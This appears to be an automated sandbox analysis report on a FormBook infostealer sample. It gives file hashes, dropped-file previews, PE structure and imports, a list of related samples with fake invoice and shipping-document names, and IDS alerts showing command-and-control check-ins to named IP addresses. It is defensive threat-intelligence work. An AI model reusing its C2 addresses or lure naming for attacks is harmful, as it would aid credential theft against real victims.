REGISTER-ASIT | rAGROTIS10599242024.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | BL Draft-Invoice-Packing list-Shipping Document.pif.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | oO3ZmCAeLQ.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Purchase Order_ AEPL-2324-1126.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | AWB_5771388044 Documenti di spedizione.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
REGISTER-ASIT | file.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | file.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Quote 05-302.lnk | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | ncOLm62YLB.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
REGISTER-ASIT | DOC092024-0431202229487.exe | Get hash | malicious | FormBook | Browse | 81.88.63.46
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\mstsc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):0.9746603542602881
                                              Encrypted:false
                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):50396
                                              Entropy (8bit):7.804819895302675
                                              Encrypted:false
                                              SSDEEP:1536:leeL3J851fdxDGpyPkJnseZD+fVZew9goGA:lp7J0FxqpySnLZD+fV8wz
                                              MD5:44811D0277D7A1B9311A9296C06CC07E
                                              SHA1:89A5DD1171F259CB9DCD223C2311876DCB3E3B63
                                              SHA-256:6095E6F8DCE72A56283A876495F9D3874C2CBB49EBCAE5BE16E26905A8AC6F46
                                              SHA-512:4E393F547CE586CB5656C2744B6E075D9D3F535C0B0318F03CD74E127633E0EE5A89365F58BCB679BF2A94B49A47379A995BB6EF69DAF57E6C20CE9C6E1738C8
                                              Malicious:false
                                              Reputation:low
                                              Preview:EA06.....L..y.:k'.R,T.-:.D.W&3K-..5..lu...eR.[....aI......oQ.S...Z.r.U@.....0..&.j..8..m.I.._8.M&.*..O6..f3.|.0..)....6..s....4..&3...b.Xm.{D..0..,s...Qy.^f...q<...i..q<.QlU...m#...)..a,.].....m?.K....:i]..'...:.(.....a'.Q&...p.....k..G9..*.K...c......c..-....a%.R.....m_.Rg6...kt.W...&qc...uY..aj.T..y..ac.Q..I.^sk.L.)..a:.P.6I..eu../3...v.XP...zqa..&..$.sD.^lV...e<..f...".0..H.I...8.Nm.Z..9..'v+...6..).....x.L.....U6.N&S.d.E5.Ni.i...9.M..9D...I&.I.....z.Q...Wd..i...ca.M..:..P. K.7...6......U5..ds.E..3....;d..6......4..mS.E..b.Ne3ie....\f.....PZf...~sV.Z,...:is.Y..5..`.Il.+.J.H...P..0..-...,.`..l...nk;.P..4..K.J,.5..g.Q'.Y..iY...@*D.....Sk,..9.N-.[..Q8...j...,.L....s,.[,t..x........U..*.....d..*....a?.Sl.{5F.;.\.4....:.\*.. ..Y.Q..y..q7..5..ir..l.5j.R.Q.1...q1.N,.`.B_0..* O.Fml.Jg.y..qi...k,..z.0%Vi..sf.X..0..iy.O.....!v.X....q)..)6I|..0...i...%.Ql...2.M.].t...au.T/.Z.Nmc.S....._5.Mh.*e..f.Y...E..k.P'....#..%...h...M..jd..9.N+sY..}4.Y..k..f..
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:ASCII text, with very long lines (57348), with no line terminators
                                              Category:dropped
                                              Size (bytes):57348
                                              Entropy (8bit):5.74838018161682
                                              Encrypted:false
                                              SSDEEP:1536:cbiNaZSk7xpmjwBpVqBs0nsiwJByZV0icwz7+1evKfxJJ:cGw0kdkjwzVqBs0svGV0DwX+1G+J
                                              MD5:07A96647D5F0058550E2B504FF4B0822
                                              SHA1:C5BDEA69672EDDB989CCCCE1A219E5E2524CC345
                                              SHA-256:5E2A389EDD0E515B05DD21FE60A0C56BF558276581485602EA2DDDE15FCC7D2D
                                              SHA-512:F304225BAFD7A334B1D71DAB0C0ED1122D604FFF77B62B88DFC259C926908524C9B72F0CBBA6A1363832BF78B306685D47705AAE4F4C659AD733FC610CA58D10
                                              Malicious:false
                                              Reputation:low
                                              Preview:03x'5N5'8HbLeNcD8\14efc5c%c_0D2R0n0L0:0I5s695!7QbO8n6Vbr0U0:0C0?0/056R6I8E9h4<5/8640bV9'6'510O0V090M0a0L6a6+8b9i4?d1836Mbban7h2b030c0_0O0y0y686F8<9r5v5D8<8EbP8G6#eZ0B0s0,0v0o076?6/8M9N4]5d8YaNb(9b6y5b0'0D010\0,0W6P6p8#9a4Td`8icqbmaQ6^co0l0y0G0%0K0?6x6_8I9k5-5t8_ePbI8c3{3U0.0j0S0W0>0c6F6d8W9k435"9K0:bC9d3B2u0W0y0r0;0.0C6L6^8a984|d59D2ybkav2<e]0)0>0N060,0d6b6y8t9o5]5Y9_4;b{8s6O4O0N0A0L0r0w0v6*64829L4"5n9L66bY9D6$c(0[060$040!0y6n6V8b9@4+dk9H8;b1a86ucV0(0y0/0l090]6{6(809*5'5#9ha\3}3hcl0u6A65899I4/5j9(cebb9)6,eo0C0q0J0D0N0d6i6`8_9V8hd[4N4sfff;frf`f%fRbRaH7'4U0M0\050h0M0K6b6t8t9Z9[5;4C68f4fKf(fJf}fgbD856<4Y040r0j000N036"6e8d928m5z4(8_fmf_f_f,f2fKb39,6lcN0f0K0y0p0{0K6U6V8T9w8qds4Va>frf?fMfwfQf;bsaJ6`c:0a0V0d0p0Y0G6W6w879&9\5!4rc]f)fZfRfGfrf`b98128e60.0/0I0Q030Q6l6)8w9r8i5K46e6fzfZf*f>f9f@b@9D6c4y0<010V010v0b6=6*8)928Id/5{0/f=f!f,f%fEfQbLaM6vcI0=0u0C0|0_0S6c6N8)9c9/5T5E2Lf~f6fofMfDfkb@8]6mc#0N0/0v0Z0c0D6^6L8c9<8[535>4hf&fxfgfUf*f>3=3ncw9~6D6I8k9Z80dK5-6@f]f.f8f<fPfGb!aa7`5}0`0-0m0:0T0e6<6(8W9~
                                              Process:C:\Users\user\Desktop\rP0n___87004354.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):287744
                                              Entropy (8bit):7.995578582570183
                                              Encrypted:true
                                              SSDEEP:6144:1b4+fO6sBgth4vHZmCCIOYr2iCX9giju7i6V1sHEvNjj0:eJ6h4v8aAWij2F5FU
                                              MD5:98B616737713434C6AF83B84116DF158
                                              SHA1:14E81A3B1381DB949531B4D5A0F2BEF7A58DB3DF
                                              SHA-256:0C1D7D8216968DCF34CE33C6342506EDF3B769361C9C22629198E3D2521E6D2E
                                              SHA-512:09E3C77B9DCB3CCDC909EC81C9D5137DE98CA2B57A2932CAF7E6E2F7C2004282E6370A587204FBF914CA98A9D75797059468FB6D578562FA420C9267935DBB3C
                                              Malicious:false
                                              Preview:{..e.9MF3...N.....OY...~I>...69MF3H2OGUMV83WOZI28VJ6RR769MF.H2OIJ.X8.^.{.3t.kb:;D.I?)T:S"g6,8V\#o8,.J#$.;<.rv.f^'V*iX@\.3WOZI28/K?.oWQ.p&T../ .W..m/=.(....25.,...(U..<.>.S0.ZI28VJ6R.r69.G2H..MV83WOZI.8TK=SY76kIF3H2OGUMVx WOZY28V:2RR7v9MV3H2MGUKV83WOZI48VJ6RR76IIF3J2OGUMV:3..ZI"8VZ6RR7&9MV3H2OGU]V83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV.G27.I28..2RR'69M.7H2_GUMV83WOZI28VJ.RRW69MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2OGUMV83WOZI28VJ6RR769MF3H2O
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.495256734524691
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:rP0n___87004354.exe
                                              File size:1'638'912 bytes
                                              MD5:c20955bf63ac83dcd469613d4b10504a
                                              SHA1:04613896a3d157769897706154223322988d17c1
                                              SHA256:b90c861586483b929fd0e015213742bad507395c206a9b4c338e28c075839854
                                              SHA512:3ad4be5c4af8cc26509a3141ff43271d0081cf7803d1fd1efc081b9b97daccdb7e9a38cac75cce5367244ca70c65c4f9fc1506539e3ace686b9163be544e0750
                                              SSDEEP:49152:qw80cTsjkWapjp5qDaZ0xAm1cEfCX24Bd4R5:P8sjk1POxAmjzCC
                                              TLSH:D875E02263DDC360CB669173BF6AB7017FBB38210A30B95B2F881D7DA950161166D7A3
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                              Icon Hash:aaf3e3e3938382a0
                                              Entrypoint:0x427f4a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66EAB1DF [Wed Sep 18 10:56:31 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                              Instruction
                                              Programming Language:
                                              • [ASM] VS2013 build 21005
                                              • [ C ] VS2013 build 21005
                                              • [C++] VS2013 build 21005
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2013 UPD5 build 40629
                                              • [RES] VS2013 build 21005
                                              • [LNK] VS2013 UPD5 build 40629
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0xc79e8 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18f000 | 0x7130 | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x1000 | 0x8dd2e | 0x8de00 | c2c2260508750422d20cd5cbb116b146 | False | 0.5729952505506608 | data | 6.675875439961112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 4513b58651e3d8d87c81a396e5b2f1d1 | False | 0.3353340955284553 | OpenPGP Public Key | 5.760731648769018 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data | 0xbe000 | 0x8f74 | 0x5200 | c2de4a3d214eae7e87c7bfc06bd79775 | False | 0.1017530487804878 | data | 1.1988106744719143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc | 0xc7000 | 0xc79e8 | 0xc7a00 | f4e099ee3cf4a58e8dd01871bc82d010 | False | 0.967372906230432 | data | 7.968405964004619 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x18f000 | 0x7130 | 0x7200 | 1254908a9a03d2bcf12045d49cd572b9 | False | 0.7703536184210527 | data | 6.782377328042204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                              RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                              RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                              RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                              RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                              RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                              RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                              RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                              RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                              RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                              RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                              RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                                              RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                              RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                              RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                              RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                              RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                              RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                              RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                              RT_RCDATA | 0xcf7b8 | 0xbecad | data |  |  | 1.000314785312578
                                              RT_GROUP_ICON | 0x18e468 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                              RT_GROUP_ICON | 0x18e4e0 | 0x14 | data | English | Great Britain | 1.25
                                              RT_GROUP_ICON | 0x18e4f4 | 0x14 | data | English | Great Britain | 1.15
                                              RT_GROUP_ICON | 0x18e508 | 0x14 | data | English | Great Britain | 1.25
                                              RT_VERSION | 0x18e51c | 0xdc | data | English | Great Britain | 0.6181818181818182
                                              RT_MANIFEST | 0x18e5f8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                              DLL | Import
                                              WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                              VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                              WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                              COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                              MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                              WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                              PSAPI.DLL | GetProcessMemoryInfo
                                              IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                              USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                              UxTheme.dll | IsThemeActive
                                              KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                              USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                              GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                              COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                              ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                              SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                              ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                              OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                              Language of compilation system | Country where language is spoken | Map
                                              English | Great Britain | 
                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                              2024-09-25T12:46:29.988778+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
                                              2024-09-25T12:46:29.988778+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
                                              2024-09-25T12:46:46.637813+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 217.70.184.50 | 80 | TCP
                                              2024-09-25T12:46:49.260057+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 217.70.184.50 | 80 | TCP
                                              2024-09-25T12:46:51.747916+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 217.70.184.50 | 80 | TCP
                                              2024-09-25T12:46:54.950374+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | TCP
                                              2024-09-25T12:46:54.950374+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | TCP
